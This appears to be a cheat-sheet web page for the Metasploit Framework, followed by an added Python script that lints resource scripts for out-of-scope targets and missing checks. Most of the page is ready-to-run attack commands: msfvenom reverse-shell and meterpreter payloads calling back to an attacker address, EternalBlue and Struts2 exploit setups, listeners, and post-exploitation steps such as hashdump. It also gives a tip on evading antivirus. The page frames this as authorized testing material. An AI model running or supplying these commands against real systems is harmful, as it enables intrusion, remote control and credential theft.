CyberCheatsheets

Metasploit Framework Cheat Sheet

Modular exploitation framework for scanning, exploiting, and post-exploitation with msfconsole, handlers, and msfvenom.

Category: Exploitation & Payloads | Tags: exploit, handler, msfconsole, msfvenom, payload | Updated 2026-06-02

Overview

Metasploit Framework provides exploits, auxiliary modules, encoders, and payloads. msfconsole is the interactive CLI; msfvenom generates standalone payloads; exploit/multi/handler catches reverse connections. Use after service enumeration when you have a matching module or need staged shells.

Authorized testing only. Use only on systems, networks, and accounts you own or have explicit written permission to test. Unauthorized access is illegal.

Install

Kali / Parrot (preinstalled)

which msfconsole

Ubuntu — Rapid7 installer

curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb -o msfinstall
chmod +x msfinstall && sudo ./msfinstall

Start PostgreSQL (required for db features)

sudo systemctl start postgresql
msfdb init

Essential commands

Interactive console

msfconsole -q

Search modules

msfconsole -q -x "search type:exploit platform:linux smb; exit"

Generate payload (msfvenom)

msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.14.5 LPORT=4444 -f elf -o shell.elf
msfvenom -p windows/x64/meterpreter/reverse_https LHOST=10.10.14.5 LPORT=443 -f exe -o rev.exe

List encoders / formats

msfvenom --list payloads | grep meterpreter
msfvenom --list formats

Inside msfconsole

search eternalblue
use exploit/windows/smb/ms17_010_eternalblue
show options
set RHOSTS 192.168.1.10
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST 10.10.14.5
set LPORT 4444
check
run -j

Database / workspace

workspace -a client_a
hosts -a 192.168.1.0/24
services -p 445

Common workflows

Terminal 1 — listener

msfconsole -q -x "use exploit/multi/handler; set payload linux/x64/shell_reverse_tcp; set LHOST 0.0.0.0; set LPORT 4444; run"

Or interactively

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 10.10.14.5
set LPORT 443
set ExitOnSession false
run -j

Exploit + payload in one session

use exploit/multi/http/struts2_content_type_ognl
set RHOSTS target.htb
set RPORT 8080
set TARGETURI /
set payload linux/x64/meterpreter/reverse_tcp
set LHOST tun0
set LPORT 4444
run

After session opens

sessions -l
sessions -i 1

In meterpreter

sysinfo
getuid
hashdump
upload /local/path/tool.exe C:\\Windows\\Temp\\
shell
background

Generate staged Windows HTTPS meterpreter

msfvenom -p windows/x64/meterpreter/reverse_https LHOST=10.10.14.5 LPORT=443 -e x64/xor_dynamic -i 3 -f exe -o payload.exe

Handler must use same payload

use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_https
set LHOST 10.10.14.5
set LPORT 443
run

exploit.rc

use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS 192.168.1.50
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST 10.10.14.5
set LPORT 4444
run

Run the resource script

msfconsole -q -r exploit.rc

Flags reference

msfconsole -q                         Quiet banner
msfconsole -r file.rc                 Run resource script
search type:exploit cve:2021          Filter module search
show targets                          Compatible target indexes
setg LHOST ip                         Global option for all modules
run -j                                Run as background job
msfvenom -a x64 --platform windows    Architecture / platform
msfvenom -f raw                       Output format (elf, exe, ps1, etc.)

Tips

  • Always pair msfvenom payload type with handler payload exactly (staged vs stageless matters).
  • Use check before run when the module supports it to avoid crashing services.
  • setg LHOST on your VPN interface (e.g. tun0) saves time in labs.
  • For AV evasion, try encoders sparingly; modern EDR often flags msfvenom defaults — custom loaders may be required.
  • db_nmap imports Nmap results: db_nmap -sV 10.10.10.0/24 then services.
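
A pre-flight lint for a resource script such as the exploit.rc shown earlier, combining the authorized-testing note with the "use check before run" tip: it flags RHOSTS values outside an agreed scope and modules that are run without a prior check. This is an added example, not part of the original cheat sheet or of Metasploit; lint_rc, in_scope, the scope list and the second module block in the sample are assumptions made for illustration.

```python
import ipaddress

# Constructed sample: the page's exploit.rc followed by a made-up second module block.
SAMPLE_RC = """\
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS 192.168.1.50
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST 10.10.14.5
set LPORT 4444
run
use exploit/multi/http/struts2_content_type_ognl
set RHOSTS target.htb 10.20.0.7
check
run -j
"""

def in_scope(target, scope):
    """True/False for an IP or CIDR; None when the value cannot be parsed as one."""
    try:
        net = ipaddress.ip_network(target, strict=False)
    except ValueError:
        return None  # hostname or range syntax: cannot be decided offline
    return any(net.version == s.version and net.subnet_of(s) for s in scope)

def lint_rc(rc_text, scope_cidrs):
    """Return (line_no, message) findings for a resource script."""
    scope = [ipaddress.ip_network(c) for c in scope_cidrs]
    findings, module, checked, targets = [], None, False, False
    for no, raw in enumerate(rc_text.splitlines(), 1):
        words = raw.split()
        cmd = words[0].lower() if words else ""
        if cmd == "use" and len(words) > 1:
            module, checked, targets = words[1], False, False
        elif cmd in ("set", "setg") and len(words) > 2 and words[1].upper() == "RHOSTS":
            targets = True
            for target in " ".join(words[2:]).replace(",", " ").split():
                verdict = in_scope(target, scope)
                if verdict is None:
                    findings.append((no, f"{target}: not an IP/CIDR, confirm scope manually"))
                elif not verdict:
                    findings.append((no, f"{target}: outside authorized scope"))
        elif cmd == "check":
            checked = True
        elif cmd in ("run", "exploit") and targets and not checked:
            findings.append((no, f"{module}: run without a prior check"))
    return findings

if __name__ == "__main__":
    print(*lint_rc(SAMPLE_RC, ["192.168.1.0/24"]), sep="\n")
```

Modules with no RHOSTS set (such as exploit/multi/handler) are not flagged for a missing check, and a finding for check only applies where the module supports it.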
